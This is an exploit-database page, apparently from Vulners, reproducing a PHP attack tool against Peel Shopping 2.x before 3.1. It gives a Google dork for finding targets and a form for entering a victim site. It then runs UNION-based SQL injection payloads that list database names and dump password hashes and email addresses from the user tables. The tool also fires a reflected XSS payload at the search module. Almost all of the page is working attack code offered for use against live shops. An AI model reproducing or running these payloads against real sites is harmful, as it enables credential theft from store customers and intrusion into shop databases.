Vulners
Lucene search
Peel Shopping 2.x Cross Site Scripting / SQL Injection Exploit
# Exploit Title: Peel Shopping "catid=" SQL injection
# Google Dork: inurl:/lire/index.php?rubid=
# Date: 2024-10-02
# Exploit Author: Emiliano Febbi
# Vendor Homepage: https://www.peel-shopping.com/
# Software Link: https://github.com/advisto/peel-shopping
# Version: 2.x < 3.1
# Tested on: Windows 10
## USAGE: ##
## 1 ##
##If you want test this query: produit_details.php?id=1000&catid=100 you need db name. ##
## 2 ##
##If you want test this single parameter index.php?catid= leave the field with default.##
## 3 ##
##If you want test this parameter index.php?rubid= don't you need db name. (#Expl-3) ##
## Details: ##
##You can also test the search module affected by XSS. ##
##If you see many iframes are the switch of the tables or parameters;carefully use the ##
##characters '/' in the full path and '-' before the numericals vars. ##
#########################################################################################
#########################################################################################
*****************************************************************************************
[code] Multiple Vulnerabilities exploit [tested]
<?php
echo '<html><head><title>Peel Shopping 2.x < 3.1 "catid=" SQL injection</title></head><body><body bgcolor="black">
<font color="white"><center><pre>
#################################
#Peel Shopping 2.x < 3.1 Exploit#
#vuln finder! #
#Code by Emiliano Febbi - 2024 #
#################################
( first get db name and later run exploit )
</pre><h2>#Expl-1</h2>1 [#Query interested] -> produit_details.php?id=1000&catid=100 AND index.php?catid=<br><br>
<form action="'.$SERVER[PHP_SELF].'" method="post"><font color="white">#Get Database Name:<font color="red">
<br>(*Format: http://www.site.fr/produit_details.php?id=1000&catid=-100)</font><br>
<input type="text" name="victim_site">
<input type="submit" value="Get!"></form><br>
<font color="yellow">###########################################################</font>
<form action="'.$SERVER[PHP_SELF].'" method="post">
<font color="white">[#insert victim site]:<font color="red"><br>(*Format: http://www.site.fr/produit_details.php?id=1000&catid=-100)</font> or
<br><font color="lime">(*http://www.site.fr/index.php?catid=-1)</font><- DB_Name default<br>
<input type="text" name="victim_sitee"><br>
[#insert database name]:<br>
<input type="text" name="victim_db" value="default">
<input type="submit" value="LOAD"></form><br>
<font color="yellow">###########################################################</font><br><h2>#Expl-2</h2>
<form action="'.$SERVER[PHP_SELF].'" method="post">
<font color="white">#XSS Test[search_module]:<font color="red"><br>(*Format: http://www.site.fr/)</font><br>
<input type="text" name="site_XSS" value="http://www.site.fr/">
<input type="submit" value="test!"></form>
<br><font color="yellow">###########################################################</font><br>
</font></body></center></html>';
if($_POST['victim_site']) {
$site = $_POST['victim_site'];
print "<center><font color='red'>#DB_Name:</font>(try-1)<br>";
$gettt=file_get_contents("$site%20union%20all%20select%201,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)--");
$tags=explode('<td class="petit">',$gettt);
$tags=explode("</td>",$tags[1]);
$cleaning = array(
"performance_schema",
"information_schema",
"Accueil",
"Vous",
"ici",
"tes",
);
$ok = "";
$filtred = str_replace($cleaning, $ok, $tags[0]);
var_dump(strip_tags($filtred));
print "</center><br><br>";
print "<center><font color='red'>#DB_Name:</font>(try-2)<br>";
$gettts=file_get_contents("$site%20union%20all%20select%201,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)--");
$tagss=explode('information_schema<br>',$gettts);
$tagss=explode('" href=',$tagss[1]);
$filtreds = str_replace($cleaning, $ok, $tagss[0]);
var_dump(strip_tags($filtreds));
};;
/*#exploit*/
if($_POST['victim_sitee'] and $_POST['victim_db']) {
$sitee = $_POST['victim_sitee'];
$hack_db = $_POST['victim_db'];
?>
<center>
<font color='lime'>1- #ALL @E-Mail and Users: ~table -><font color='white'>peel_utilisateurs</font></font>-> id=&catid=<br>
<iframe src='<? echo "$sitee"; ?>%20union%20all%20select%201,(SELECT(@x)FROM(SELECT(@x:=0x00)%20,(SELECT(@x)FROM(<? echo "$hack_db"; ?>.peel_utilisateurs)WHERE(@x)IN(@x:=CONCAT(0x20,@x,mot_passe,email,0x3c62723e))))x)--' title='exploit' height='100' width='500'></iframe><br>
<font color="yellow">###########################################################</font><br>
<font color='lime'>2- #ALL @E-Mail and Users: ~table -><font color='white'>utilisateurs</font></font>-> id=&catid=<br>
<iframe src='<? echo "$sitee"; ?>%20union%20all%20select%201,(SELECT(@x)FROM(SELECT(@x:=0x00)%20,(SELECT(@x)FROM(<? echo "$hack_db"; ?>.utilisateurs)WHERE(@x)IN(@x:=CONCAT(0x20,@x,mot_passe,email,0x3c62723e))))x)--' title='exploit' height='100' width='500'></iframe><br>
<font color='lime'>3- #ALL @E-Mail and Users: ~table -><font color='white'>peel_utilisateurs</font></font>-> catid=<br>
<iframe src='<? echo "$sitee"; ?>+union+all+select+1,mot_passe,3,4+FROM+peel_utilisateurs--' title='exploit' height='100' width='500'></iframe>
</center>
<?
print "<center><font color='red'>[emails cracked]+md5:</font><br>";
$textt=file_get_contents("$sitee+%20union%20all%20select%201,(SELECT(@x)FROM(SELECT(@x:=0x00)%20,(SELECT(@x)FROM($hack_db.peel_utilisateurs)WHERE(@x)IN(@x:=CONCAT(0x20,@x,mot_passe,email,0x3c62723e))))x)--");
$ress = preg_match_all(
"/[a-z0-9]+[_a-z0-9\.-]*[a-z0-9]+@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})/i",
$textt,
$matchess
);
if ($ress) {
foreach(array_unique($matchess[0]) as $emails) {
echo $emails . "<br />";
}
}
else {
echo "No emails found.";
}
};;;
/*#exploit*/
echo '<center><h2>#Expl-3</h2><br><form action="'.$SERVER[PHP_SELF].'" method="post">
<font color="white">independent -> #try again to hack!:</font><font color="red"><br>(*Format: http://www.site.fr)</font><br>
<input type="text" name="hack2" value="http://www.site.fr"><br>
<input type="submit" value="LOAD"></center><br>';
if($_POST['hack2']) {
$hackk = $_POST['hack2'];
echo '<center><br><font color="yellow">###########################################################</font><br>';
echo "2 [#Query interested] -> index.php?rubid=<br><font color='red'>#password1:</font>(try-1)<br>";
?>
<iframe src='<? echo "$hackk/index.php?rubid=-3+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,mot_passe,3+FROM+peel_utilisateurs--"; ?>' title='exploit' height='100' width='500'></iframe><br>
<font color='red'>#password2:</font>(try-2)<br>
<iframe src='<? echo "$hackk/index.php?rubid=-3+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,mot_passe,3+FROM+utilisateurs--"; ?>' title='exploit' height='100' width='500'></iframe><br>
<font color='red'>#password3:</font>(try-3)<br>
<iframe src='<? echo "$hackk/index.php?rubid=-3+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,mot_passe+FROM+peel_utilisateurs--"; ?>' title='exploit' height='100' width='500'></iframe><br>
<font color='red'>#password4:</font>(try-4)<br>
<iframe src='<? echo "$hackk/index.php?rubid=-3+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,mot_passe+FROM+utilisateurs--"; ?>' title='exploit' height='100' width='500'></iframe><br>
<?
print "<font color='red'>[emails cracked]:</font><br>";
$text=file_get_contents("$hackk/index.php?rubid=-1+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,email,3%20FROM%20peel_utilisateurs--");
$res = preg_match_all(
"/[a-z0-9]+[_a-z0-9\.-]*[a-z0-9]+@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})/i",
$text,
$matches
);
if ($res) {
foreach(array_unique($matches[0]) as $email) {
echo $email . "<br />";
}
}
else {
echo "No emails found.";
}
};;;;;
/*#exploit*/
if($_POST['site_XSS']) {
$XSS = $_POST['site_XSS'];
?>
<center><iframe src='<? echo "$XSS"; ?>recherche.php?start=0&motclef=<script>alert("XSS vulnerable!")</script>' title='exploit3' height='100' width='500'></iframe></center><br>
<?
};;;;
?>
[/code]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Oct 2024 00:00Current
7.8High risk
Vulners AI Score7.8